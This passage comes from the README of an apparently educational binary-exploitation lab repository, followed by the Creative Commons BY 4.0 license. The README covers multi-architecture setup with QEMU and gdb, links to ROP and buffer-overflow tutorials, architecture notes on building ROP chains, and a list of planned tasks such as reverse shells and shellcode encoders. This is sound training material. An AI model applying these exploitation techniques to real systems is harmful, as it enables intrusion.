| [08-overwrite-global](src/08-overwrite-global.c) | [+](pwn/x86/08-overwrite-global.py) | [+](pwn/x86-64/08-overwrite-global.py) | [+](pwn/arm/08-overwrite-global.py) | [+](pwn/arm64/08-overwrite-global.py) | [+](pwn/mips/08-overwrite-global.py) | [+](pwn/mips64/08-overwrite-global.py) | [+](pwn/ppc/08-overwrite-global.py) | [+](pwn/ppc64/08-overwrite-global.py) | | 101 | 102 | 103 | ## Prerequisites 104 | 105 | The tasks were tested on x86-64 CPU machine with Linux Mint 19.1 and the following software versions: 106 | 107 | | Software | Version | 108 | | :---: | :---: | 109 | | GCC | (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0 | 110 | | glibc | (Ubuntu GLIBC 2.27-3ubuntu1) 2.27 | 111 | | QEMU | 2.11.1(Debian 1:2.11+dfsg-1ubuntu7.12) | 112 | | GDB | (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git | 113 | | pwntools | 3.12.2 | 114 | | Ropper | 1.11.13 | 115 | 116 | Issues: 117 | 118 | 1. 
`qemu-ppc64` requires a newer QEMU (with [this](https://patchwork.kernel.org/patch/10243489/) patch), so you'll need to build QEMU from source. 119 | If the manually built QEMU doesn't know where to look for dynamic libs, run `export QEMU_LD_PREFIX=/etc/qemu-binfmt/ppc64/` before using `pwntools`. 120 | 121 | 2. `ropper` has poor support for `ppc` and `ppc64`, so [this](https://github.com/sashs/Ropper/pull/98) patch is recommended to recognize more gadgets. 122 | 123 | 3. `ropper` doesn't recognize `ppc64` binaries automatically and requires [this](https://github.com/sashs/Ropper/pull/100) patch (you may also explicitly provide `--arch PPC64`). 124 | 125 | 4. `pwntools` doesn't set the GDB architecture name for `sparc64` correctly and requires [this](https://github.com/Gallopsled/pwntools/pull/1292) patch. 126 | 127 | 5. Neither `ropper` nor `ROPgadget` supports `sparc64`; `ropper` requires [this](https://github.com/sashs/Ropper/pull/101) patch. 128 | 129 | 130 | ### Setup 131 | 132 | Install packages: 133 | 134 | ``` bash 135 | sudo apt-get install build-essential 136 | sudo apt-get install gcc-arm-linux-gnueabihf gcc-aarch64-linux-gnu gcc-mips-linux-gnu gcc-mips64-linux-gnuabi64 gcc-powerpc-linux-gnu gcc-powerpc64-linux-gnu gcc-sparc64-linux-gnu 137 | sudo apt-get install libc6-dev:i386 libc6-armhf-cross libc6-arm64-cross libc6-mips-cross libc6-mips64-cross libc6-powerpc-cross libc6-ppc64-cross libc6-sparc64-cross 138 | sudo apt-get install qemu-user 139 | sudo apt-get install gdb gdb-multiarch 140 | 141 | # These are probably not required, but just in case: 142 | # sudo apt-get install gcc-7-multilib gcc-multilib-arm-linux-gnueabi gcc-multilib-mips-linux-gnu gcc-multilib-mips64-linux-gnuabi64 gcc-multilib-powerpc-linux-gnu gcc-multilib-powerpc64-linux-gnu 143 | ``` 144 | 145 | Build the binaries: 146 | 147 | ``` bash 148 | ./build.sh 149 | ``` 150 | 151 | Install pwntools and ropper (assuming that you have `pip` installed; the versions the solutions were tested with are listed in the table above): 152 | 153 | ``` bash 154 | pip install --user
pwntools ropper 155 | ``` 156 | 157 | Setup `qemu-binfmt` for QEMU and pwntools: 158 | 159 | ``` bash 160 | sudo mkdir /etc/qemu-binfmt 161 | sudo ln -s /usr/arm-linux-gnueabihf/ /etc/qemu-binfmt/arm 162 | sudo ln -s /usr/aarch64-linux-gnu /etc/qemu-binfmt/aarch64 163 | sudo ln -s /usr/mips-linux-gnu/ /etc/qemu-binfmt/mips 164 | sudo ln -s /usr/mips64-linux-gnuabi64/ /etc/qemu-binfmt/mips64 165 | sudo ln -s /usr/powerpc-linux-gnu/ /etc/qemu-binfmt/ppc 166 | sudo ln -s /usr/powerpc64-linux-gnu/ /etc/qemu-binfmt/ppc64 167 | sudo ln -s /usr/sparc64-linux-gnu/ /etc/qemu-binfmt/sparc64 168 | ``` 169 | 170 | 171 | ### More 172 | 173 | In case you want to run the binaries and QEMU manually: 174 | 175 | ``` bash 176 | gdbserver --no-disable-randomization localhost:1234 ./bin/x86/00-hello-pwn 177 | gdbserver --no-disable-randomization localhost:1234 ./bin/x86-64/00-hello-pwn 178 | qemu-arm -L /usr/arm-linux-gnueabihf/ -g 1234 ./bin/arm/00-hello-pwn 179 | qemu-aarch64 -L /usr/aarch64-linux-gnu/ -g 1234 ./bin/arm64/00-hello-pwn 180 | qemu-mips -L /usr/mips-linux-gnu/ -g 1234 ./bin/mips/00-hello-pwn 181 | qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -g 1234 ./bin/mips64/00-hello-pwn 182 | qemu-ppc -L /usr/powerpc-linux-gnu/ -g 1234 ./bin/ppc/00-hello-pwn 183 | qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -g 1234 ./bin/ppc64/00-hello-pwn 184 | qemu-sparc64 -L /usr/sparc64-linux-gnu/ -g 1234 ./bin/sparc64/00-hello-pwn 185 | ``` 186 | 187 | ``` bash 188 | gdb -q -ex "set architecture i386" -ex "set solib-search-path /lib/i386-linux-gnu/" -ex "target remote localhost:1234" ./bin/x86/00-hello-pwn 189 | gdb -q -ex "target remote localhost:1234" ./bin/x86-64/00-hello-pwn 190 | gdb-multiarch -q -ex "set architecture arm" -ex "set solib-absolute-prefix /usr/arm-linux-gnueabihf/" -ex "target remote localhost:1234" ./bin/arm/00-hello-pwn 191 | gdb-multiarch -q -ex "set architecture aarch64" -ex "set solib-absolute-prefix /usr/aarch64-linux-gnu/" -ex "target remote localhost:1234" 
./bin/arm64/00-hello-pwn 192 | gdb-multiarch -q -ex "set architecture mips" -ex "set solib-absolute-prefix /usr/mips-linux-gnu/" -ex "target remote localhost:1234" ./bin/mips/00-hello-pwn 193 | gdb-multiarch -q -ex "set architecture mips64" -ex "set solib-absolute-prefix /usr/mips64-linux-gnuabi64/" -ex "target remote localhost:1234" ./bin/mips64/00-hello-pwn 194 | gdb-multiarch -q -ex "set architecture powerpc:common" -ex "set solib-absolute-prefix /usr/powerpc-linux-gnu/" -ex "target remote localhost:1234" ./bin/ppc/00-hello-pwn 195 | gdb-multiarch -q -ex "set architecture powerpc:common64" -ex "set solib-absolute-prefix /usr/powerpc64-linux-gnu/" -ex "target remote localhost:1234" ./bin/ppc64/00-hello-pwn 196 | gdb-multiarch -q -ex "set architecture sparc:v9" -ex "set solib-absolute-prefix /usr/sparc64-linux-gnu/" -ex "target remote localhost:1234" ./bin/sparc64/00-hello-pwn 197 | ``` 198 | 199 | If you want to do full system emulation, you can do that either manually via `qemu-system-*` or via [arm_now](https://github.com/nongiach/arm_now). 200 | 201 | 202 | ## Materials 203 | 204 | I'm not aiming to provide a thoroughly collected list of materials to learn binary exploitation here, so for the most part you should rely on your own ability to find them. 205 | I'll still put here some links that I have found helpful. 206 | 207 | [Linux syscall tables](https://w3challs.com/syscalls/) 208 | 209 | ### x86 and x86-64 210 | 211 | Countless tutorials available online for these architectures. 
212 | 213 | ### arm 214 | 215 | [INTRODUCTION TO ARM ASSEMBLY BASICS](https://azeria-labs.com/writing-arm-assembly-part-1/) [articles] 216 | 217 | [ARM shellcode and exploit development](https://github.com/invictus1306/Workshop-BSidesMunich2018/blob/master/workshop_slides.pdf) [slides] 218 | 219 | ### arm64 220 | 221 | [ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile](https://static.docs.arm.com/ddi0487/b/DDI0487B_a_armv8_arm.pdf) [book] 222 | 223 | [Introduction to A64 Instruction Set](https://blog.linuxplumbersconf.org/2014/ocw//system/presentations/2361/original/02%20-%20a64-isa-intro-final.pdf) [slides] 224 | 225 | [ROP-ing on Aarch64 - The CTF Style](https://blog.perfect.blue/ROPing-on-Aarch64) [article] 226 | 227 | [GoogleCTF - forced-puns](https://0xabe.io/ctf/exploit/2016/05/02/GoogleCTF-forced-puns.html) [article] 228 | 229 | ### mips 230 | 231 | [MIPS IV Instruction Set](http://math-atlas.sourceforge.net/devel/assembly/mips-iv.pdf) [book] 232 | 233 | [MIPS Calling Convention](https://courses.cs.washington.edu/courses/cse410/09sp/examples/MIPSCallingConventionsSummary.pdf) [article] 234 | 235 | [EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES](https://www.vantagepoint.sg/papers/MIPS-BOF-LyonYang-PUBLIC-FINAL.pdf) [article] 236 | 237 | [Exploiting a MIPS Stack Overflow](http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/) [article] 238 | 239 | Notes: 240 | 241 | 1. `mips` has branch delay slot. 242 | 243 | ### mips64 244 | 245 | [MIPS64 Architecture For Programmers Volume II: The MIPS64 Instruction Set](https://scc.ustc.edu.cn/zlsc/lxwycj/200910/W020100308600769158777.pdf) [book] 246 | 247 | [Linux MIPS ELF reverse engineering tips](https://www.cr0.org/paper/mips.elf.external.resolution.txt) [article] 248 | 249 | Notes: 250 | 251 | 1. `mips64` has branch delay slot. 252 | 253 | 2. Functions expect to be called through `$t9`. 
254 | 255 | ### ppc 256 | 257 | [PowerPC User Instruction Set Architecture Book I Version 2.01](http://math-atlas.sourceforge.net/devel/assembly/ppc_isa.pdf) [book] 258 | 259 | [POWERPC FUNCTION CALLING CONVENTION](https://g4laad.re/part-6-powerpc-stack-and-function/) [article] 260 | 261 | [Router Exploitation](https://www.recurity-labs.com/research/FX_Router_Exploitation.pdf) [slides] 262 | 263 | [CVE-2017-3881 Cisco Catalyst RCE Proof-Of-Concept](https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/) [article] 264 | 265 | [How To Cook Cisco](https://embedi.org/blog/how-cook-cisco/) [article] 266 | 267 | ### ppc64 268 | 269 | [PowerPC User Instruction Set Architecture Book I Version 2.01](http://math-atlas.sourceforge.net/devel/assembly/ppc_isa.pdf) [book] 270 | 271 | [64-bit PowerPC ELF Application Binary Interface Supplement 1.9](https://refspecs.linuxfoundation.org/ELF/ppc64/PPC-elf64abi-1.9.html) [article] 272 | 273 | [Deeply understand 64-bit PowerPC ELF ABI - Function Descriptors](https://www.ibm.com/developerworks/community/blogs/5894415f-be62-4bc0-81c5-3956e82276f3/entry/deeply_understand_64_bit_powerpc_elf_abi_function_descriptors?lang=en) [article] 274 | 275 | Notes: 276 | 277 | 1. Functions expect a correct value of `$r2` (the TOC pointer) when called. A function symbol points to a descriptor in `.opd` (entry address, TOC pointer, environment pointer) rather than to code, so a ROP chain that returns straight into the entry address has to load `$r2` itself — see the `.opd` dump in the ppc64 `06-system-rop` solution.
278 | 279 | ### sparc 280 | 281 | [The SPARC Architecture Manual Version 8](https://www.gaisler.com/doc/sparcv8.pdf) [book] 282 | 283 | [Function Call and Return in SPARC combined with Sliding Register Windows](http://www.mathcs.emory.edu/~cheung/Courses/255/Syllabus/8-SPARC/func-call+ret.html) [article] 284 | 285 | [When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC](https://hovav.net/ucsd/dist/sparc.pdf) [paper] 286 | 287 | [Buffer Overflows On the SPARC Architecture](http://www.davidlitchfield.com/sparc_buffer_overflows.pdf) [article] 288 | 289 | ### sparc64 290 | 291 | [The SPARC Architecture Manual Version 9](https://cr.yp.to/2005-590/sparcv9.pdf) [book] 292 | 293 | [SPARC V9 ABI Features](https://docs.oracle.com/cd/E19120-01/open.solaris/816-5138/advanced-2/index.html) [article] 294 | 295 | Notes: 296 | 297 | 1. `sparc64` has a branch delay slot. 298 | 299 | 2. `sparc64` has a stack bias of 2047 bytes. 300 | 301 | 3. The `sparc64` CPU used by QEMU has 8 register windows. 302 | 303 | 4.
Figure out why and when `vulnerable()` register window gets loaded from the stack, none of the linked ROP tutorials mention it :) 304 | 305 | 306 | ## Someday 307 | 308 | Some ideas for more tasks: 309 | 310 | XX-dup2-rop, 311 | XX-aaw-rop, 312 | XX-format-string, 313 | XX-reverse-shell, 314 | XX-oneshot-write, 315 | XX-oneshot-syscall, 316 | XX-bruteforce-aslr, 317 | XX-bruteforce-canary, 318 | XX-overwrite-got, 319 | XX-partial-ret, 320 | XX-partial-got, 321 | XX-sleep-shellcode, 322 | XX-mprotect-shellcode, 323 | XX-nonull-shellcode, 324 | XX-alphanum-shellcode, 325 | XX-shellcode-encoder, 326 | XX-nop-sled, 327 | XX-ret-sled, 328 | XX-canary-master, 329 | XX-canary-leak, 330 | XX-magic-gadget, 331 | XX-stack-pivot, 332 | XX-egghunt 333 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Attribution 4.0 International 2 | 3 | ======================================================================= 4 | 5 | Creative Commons Corporation ("Creative Commons") is not a law firm and 6 | does not provide legal services or legal advice. Distribution of 7 | Creative Commons public licenses does not create a lawyer-client or 8 | other relationship. Creative Commons makes its licenses and related 9 | information available on an "as-is" basis. Creative Commons gives no 10 | warranties regarding its licenses, any material licensed under their 11 | terms and conditions, or any related information. Creative Commons 12 | disclaims all liability for damages resulting from their use to the 13 | fullest extent possible. 14 | 15 | Using Creative Commons Public Licenses 16 | 17 | Creative Commons public licenses provide a standard set of terms and 18 | conditions that creators and other rights holders may use to share 19 | original works of authorship and other material subject to copyright 20 | and certain other rights specified in the public license below. 
The 21 | following considerations are for informational purposes only, are not 22 | exhaustive, and do not form part of our licenses. 23 | 24 | Considerations for licensors: Our public licenses are 25 | intended for use by those authorized to give the public 26 | permission to use material in ways otherwise restricted by 27 | copyright and certain other rights. Our licenses are 28 | irrevocable. Licensors should read and understand the terms 29 | and conditions of the license they choose before applying it. 30 | Licensors should also secure all rights necessary before 31 | applying our licenses so that the public can reuse the 32 | material as expected. Licensors should clearly mark any 33 | material not subject to the license. This includes other CC- 34 | licensed material, or material used under an exception or 35 | limitation to copyright. More considerations for licensors: 36 | wiki.creativecommons.org/Considerations_for_licensors 37 | 38 | Considerations for the public: By using one of our public 39 | licenses, a licensor grants the public permission to use the 40 | licensed material under specified terms and conditions. If 41 | the licensor's permission is not necessary for any reason--for 42 | example, because of any applicable exception or limitation to 43 | copyright--then that use is not regulated by the license. Our 44 | licenses grant only permissions under copyright and certain 45 | other rights that a licensor has authority to grant. Use of 46 | the licensed material may still be restricted for other 47 | reasons, including because others have copyright or other 48 | rights in the material. A licensor may make special requests, 49 | such as asking that all changes be marked or described. 50 | Although not required by our licenses, you are encouraged to 51 | respect those requests where reasonable. 
More considerations 52 | for the public: 53 | wiki.creativecommons.org/Considerations_for_licensees 54 | 55 | ======================================================================= 56 | 57 | Creative Commons Attribution 4.0 International Public License 58 | 59 | By exercising the Licensed Rights (defined below), You accept and agree 60 | to be bound by the terms and conditions of this Creative Commons 61 | Attribution 4.0 International Public License ("Public License"). To the 62 | extent this Public License may be interpreted as a contract, You are 63 | granted the Licensed Rights in consideration of Your acceptance of 64 | these terms and conditions, and the Licensor grants You such rights in 65 | consideration of benefits the Licensor receives from making the 66 | Licensed Material available under these terms and conditions. 67 | 68 | 69 | Section 1 -- Definitions. 70 | 71 | a. Adapted Material means material subject to Copyright and Similar 72 | Rights that is derived from or based upon the Licensed Material 73 | and in which the Licensed Material is translated, altered, 74 | arranged, transformed, or otherwise modified in a manner requiring 75 | permission under the Copyright and Similar Rights held by the 76 | Licensor. For purposes of this Public License, where the Licensed 77 | Material is a musical work, performance, or sound recording, 78 | Adapted Material is always produced where the Licensed Material is 79 | synched in timed relation with a moving image. 80 | 81 | b. Adapter's License means the license You apply to Your Copyright 82 | and Similar Rights in Your contributions to Adapted Material in 83 | accordance with the terms and conditions of this Public License. 84 | 85 | c. 
Copyright and Similar Rights means copyright and/or similar rights 86 | closely related to copyright including, without limitation, 87 | performance, broadcast, sound recording, and Sui Generis Database 88 | Rights, without regard to how the rights are labeled or 89 | categorized. For purposes of this Public License, the rights 90 | specified in Section 2(b)(1)-(2) are not Copyright and Similar 91 | Rights. 92 | 93 | d. Effective Technological Measures means those measures that, in the 94 | absence of proper authority, may not be circumvented under laws 95 | fulfilling obligations under Article 11 of the WIPO Copyright 96 | Treaty adopted on December 20, 1996, and/or similar international 97 | agreements. 98 | 99 | e. Exceptions and Limitations means fair use, fair dealing, and/or 100 | any other exception or limitation to Copyright and Similar Rights 101 | that applies to Your use of the Licensed Material. 102 | 103 | f. Licensed Material means the artistic or literary work, database, 104 | or other material to which the Licensor applied this Public 105 | License. 106 | 107 | g. Licensed Rights means the rights granted to You subject to the 108 | terms and conditions of this Public License, which are limited to 109 | all Copyright and Similar Rights that apply to Your use of the 110 | Licensed Material and that the Licensor has authority to license. 111 | 112 | h. Licensor means the individual(s) or entity(ies) granting rights 113 | under this Public License. 114 | 115 | i. Share means to provide material to the public by any means or 116 | process that requires permission under the Licensed Rights, such 117 | as reproduction, public display, public performance, distribution, 118 | dissemination, communication, or importation, and to make material 119 | available to the public including in ways that members of the 120 | public may access the material from a place and at a time 121 | individually chosen by them. 122 | 123 | j. 
Sui Generis Database Rights means rights other than copyright 124 | resulting from Directive 96/9/EC of the European Parliament and of 125 | the Council of 11 March 1996 on the legal protection of databases, 126 | as amended and/or succeeded, as well as other essentially 127 | equivalent rights anywhere in the world. 128 | 129 | k. You means the individual or entity exercising the Licensed Rights 130 | under this Public License. Your has a corresponding meaning. 131 | 132 | 133 | Section 2 -- Scope. 134 | 135 | a. License grant. 136 | 137 | 1. Subject to the terms and conditions of this Public License, 138 | the Licensor hereby grants You a worldwide, royalty-free, 139 | non-sublicensable, non-exclusive, irrevocable license to 140 | exercise the Licensed Rights in the Licensed Material to: 141 | 142 | a. reproduce and Share the Licensed Material, in whole or 143 | in part; and 144 | 145 | b. produce, reproduce, and Share Adapted Material. 146 | 147 | 2. Exceptions and Limitations. For the avoidance of doubt, where 148 | Exceptions and Limitations apply to Your use, this Public 149 | License does not apply, and You do not need to comply with 150 | its terms and conditions. 151 | 152 | 3. Term. The term of this Public License is specified in Section 153 | 6(a). 154 | 155 | 4. Media and formats; technical modifications allowed. The 156 | Licensor authorizes You to exercise the Licensed Rights in 157 | all media and formats whether now known or hereafter created, 158 | and to make technical modifications necessary to do so. The 159 | Licensor waives and/or agrees not to assert any right or 160 | authority to forbid You from making technical modifications 161 | necessary to exercise the Licensed Rights, including 162 | technical modifications necessary to circumvent Effective 163 | Technological Measures. For purposes of this Public License, 164 | simply making modifications authorized by this Section 2(a) 165 | (4) never produces Adapted Material. 166 | 167 | 5. 
Downstream recipients. 168 | 169 | a. Offer from the Licensor -- Licensed Material. Every 170 | recipient of the Licensed Material automatically 171 | receives an offer from the Licensor to exercise the 172 | Licensed Rights under the terms and conditions of this 173 | Public License. 174 | 175 | b. No downstream restrictions. You may not offer or impose 176 | any additional or different terms or conditions on, or 177 | apply any Effective Technological Measures to, the 178 | Licensed Material if doing so restricts exercise of the 179 | Licensed Rights by any recipient of the Licensed 180 | Material. 181 | 182 | 6. No endorsement. Nothing in this Public License constitutes or 183 | may be construed as permission to assert or imply that You 184 | are, or that Your use of the Licensed Material is, connected 185 | with, or sponsored, endorsed, or granted official status by, 186 | the Licensor or others designated to receive attribution as 187 | provided in Section 3(a)(1)(A)(i). 188 | 189 | b. Other rights. 190 | 191 | 1. Moral rights, such as the right of integrity, are not 192 | licensed under this Public License, nor are publicity, 193 | privacy, and/or other similar personality rights; however, to 194 | the extent possible, the Licensor waives and/or agrees not to 195 | assert any such rights held by the Licensor to the limited 196 | extent necessary to allow You to exercise the Licensed 197 | Rights, but not otherwise. 198 | 199 | 2. Patent and trademark rights are not licensed under this 200 | Public License. 201 | 202 | 3. To the extent possible, the Licensor waives any right to 203 | collect royalties from You for the exercise of the Licensed 204 | Rights, whether directly or through a collecting society 205 | under any voluntary or waivable statutory or compulsory 206 | licensing scheme. In all other cases the Licensor expressly 207 | reserves any right to collect such royalties. 208 | 209 | 210 | Section 3 -- License Conditions. 
211 | 212 | Your exercise of the Licensed Rights is expressly made subject to the 213 | following conditions. 214 | 215 | a. Attribution. 216 | 217 | 1. If You Share the Licensed Material (including in modified 218 | form), You must: 219 | 220 | a. retain the following if it is supplied by the Licensor 221 | with the Licensed Material: 222 | 223 | i. identification of the creator(s) of the Licensed 224 | Material and any others designated to receive 225 | attribution, in any reasonable manner requested by 226 | the Licensor (including by pseudonym if 227 | designated); 228 | 229 | ii. a copyright notice; 230 | 231 | iii. a notice that refers to this Public License; 232 | 233 | iv. a notice that refers to the disclaimer of 234 | warranties; 235 | 236 | v. a URI or hyperlink to the Licensed Material to the 237 | extent reasonably practicable; 238 | 239 | b. indicate if You modified the Licensed Material and 240 | retain an indication of any previous modifications; and 241 | 242 | c. indicate the Licensed Material is licensed under this 243 | Public License, and include the text of, or the URI or 244 | hyperlink to, this Public License. 245 | 246 | 2. You may satisfy the conditions in Section 3(a)(1) in any 247 | reasonable manner based on the medium, means, and context in 248 | which You Share the Licensed Material. For example, it may be 249 | reasonable to satisfy the conditions by providing a URI or 250 | hyperlink to a resource that includes the required 251 | information. 252 | 253 | 3. If requested by the Licensor, You must remove any of the 254 | information required by Section 3(a)(1)(A) to the extent 255 | reasonably practicable. 256 | 257 | 4. If You Share Adapted Material You produce, the Adapter's 258 | License You apply must not prevent recipients of the Adapted 259 | Material from complying with this Public License. 260 | 261 | 262 | Section 4 -- Sui Generis Database Rights. 
263 | 264 | Where the Licensed Rights include Sui Generis Database Rights that 265 | apply to Your use of the Licensed Material: 266 | 267 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right 268 | to extract, reuse, reproduce, and Share all or a substantial 269 | portion of the contents of the database; 270 | 271 | b. if You include all or a substantial portion of the database 272 | contents in a database in which You have Sui Generis Database 273 | Rights, then the database in which You have Sui Generis Database 274 | Rights (but not its individual contents) is Adapted Material; and 275 | 276 | c. You must comply with the conditions in Section 3(a) if You Share 277 | all or a substantial portion of the contents of the database. 278 | 279 | For the avoidance of doubt, this Section 4 supplements and does not 280 | replace Your obligations under this Public License where the Licensed 281 | Rights include other Copyright and Similar Rights. 282 | 283 | 284 | Section 5 -- Disclaimer of Warranties and Limitation of Liability. 285 | 286 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE 287 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS 288 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF 289 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS, 290 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION, 291 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR 292 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS, 293 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT 294 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT 295 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU. 296 | 297 | b. 
TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE 298 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, 299 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT, 300 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES, 301 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR 302 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN 303 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR 304 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR 305 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU. 306 | 307 | c. The disclaimer of warranties and limitation of liability provided 308 | above shall be interpreted in a manner that, to the extent 309 | possible, most closely approximates an absolute disclaimer and 310 | waiver of all liability. 311 | 312 | 313 | Section 6 -- Term and Termination. 314 | 315 | a. This Public License applies for the term of the Copyright and 316 | Similar Rights licensed here. However, if You fail to comply with 317 | this Public License, then Your rights under this Public License 318 | terminate automatically. 319 | 320 | b. Where Your right to use the Licensed Material has terminated under 321 | Section 6(a), it reinstates: 322 | 323 | 1. automatically as of the date the violation is cured, provided 324 | it is cured within 30 days of Your discovery of the 325 | violation; or 326 | 327 | 2. upon express reinstatement by the Licensor. 328 | 329 | For the avoidance of doubt, this Section 6(b) does not affect any 330 | right the Licensor may have to seek remedies for Your violations 331 | of this Public License. 332 | 333 | c. For the avoidance of doubt, the Licensor may also offer the 334 | Licensed Material under separate terms or conditions or stop 335 | distributing the Licensed Material at any time; however, doing so 336 | will not terminate this Public License. 337 | 338 | d. 
Sections 1, 5, 6, 7, and 8 survive termination of this Public 339 | License. 340 | 341 | 342 | Section 7 -- Other Terms and Conditions. 343 | 344 | a. The Licensor shall not be bound by any additional or different 345 | terms or conditions communicated by You unless expressly agreed. 346 | 347 | b. Any arrangements, understandings, or agreements regarding the 348 | Licensed Material not stated herein are separate from and 349 | independent of the terms and conditions of this Public License. 350 | 351 | 352 | Section 8 -- Interpretation. 353 | 354 | a. For the avoidance of doubt, this Public License does not, and 355 | shall not be interpreted to, reduce, limit, restrict, or impose 356 | conditions on any use of the Licensed Material that could lawfully 357 | be made without permission under this Public License. 358 | 359 | b. To the extent possible, if any provision of this Public License is 360 | deemed unenforceable, it shall be automatically reformed to the 361 | minimum extent necessary to make it enforceable. If the provision 362 | cannot be reformed, it shall be severed from this Public License 363 | without affecting the enforceability of the remaining terms and 364 | conditions. 365 | 366 | c. No term or condition of this Public License will be waived and no 367 | failure to comply consented to unless expressly agreed to by the 368 | Licensor. 369 | 370 | d. Nothing in this Public License constitutes or may be interpreted 371 | as a limitation upon, or waiver of, any privileges and immunities 372 | that apply to the Licensor or You, including from the legal 373 | processes of any jurisdiction or authority. 374 | 375 | 376 | ======================================================================= 377 | 378 | Creative Commons is not a party to its public licenses. 
379 | Notwithstanding, Creative Commons may elect to apply one of its public 380 | licenses to material it publishes and in those instances will be 381 | considered the “Licensor.” The text of the Creative Commons public 382 | licenses is dedicated to the public domain under the CC0 Public Domain 383 | Dedication. Except for the limited purpose of indicating that material 384 | is shared under a Creative Commons public license or as otherwise 385 | permitted by the Creative Commons policies published at 386 | creativecommons.org/policies, Creative Commons does not authorize the 387 | use of the trademark "Creative Commons" or any other trademark or logo 388 | of Creative Commons without its prior written consent including, 389 | without limitation, in connection with any unauthorized modifications 390 | to any of its public licenses or any other arrangements, 391 | understandings, or agreements concerning use of licensed material. For 392 | the avoidance of doubt, this paragraph does not form part of the public 393 | licenses. 394 | 395 | Creative Commons may be contacted at creativecommons.org. 396 | --------------------------------------------------------------------------------